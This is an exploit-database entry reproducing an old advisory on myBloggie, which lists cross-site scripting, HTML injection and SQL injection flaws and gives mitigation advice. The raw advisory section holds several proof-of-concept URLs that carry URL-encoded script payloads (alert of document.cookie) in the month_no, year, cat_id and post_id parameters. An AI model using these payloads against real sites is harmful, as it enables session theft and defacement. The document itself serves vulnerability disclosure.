header-logo
Suggest Exploit
vendor:
myBloggie
by:
7.5
CVSS
HIGH
Cross-site Scripting (XSS), HTML Injection, SQL Injection
79, 80, 89
CWE
Product Name: myBloggie
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

myBloggie Multiple Vulnerabilities

An attacker can exploit these vulnerabilities in myBloggie to carry out cross-site scripting, HTML injection, and SQL injection attacks. This can lead to theft of authentication credentials, disclosure of sensitive data, and other potential attacks. The attacker can also compromise the integrity of the site by deleting arbitrary comments.

Mitigation:

Apply patches or updates provided by the vendor. Regularly update the myBloggie application to the latest version. Implement input validation and sanitization to prevent cross-site scripting, HTML injection, and SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13507/info

myBloggie is affected by multiple vulnerabilities.

An attacker may leverage these issues to carry out cross-site scripting, HTML injection and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks. The integrity of a site may be compromised by deleting arbitrary comments as well. 

Cross-site scripting:
http://www.example.com/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert
(document.cookies)%3C/script%3E

HTML injection:
http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72%
69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2
9%3C%2F%73%63%72%69%70%74%3EC

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63
%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%
65%29%3C%2F%73%63%72%69%70%74%3E

http://www.example.com/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72%
69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2
9%3C%2F%73%63%72%69%70%74%3E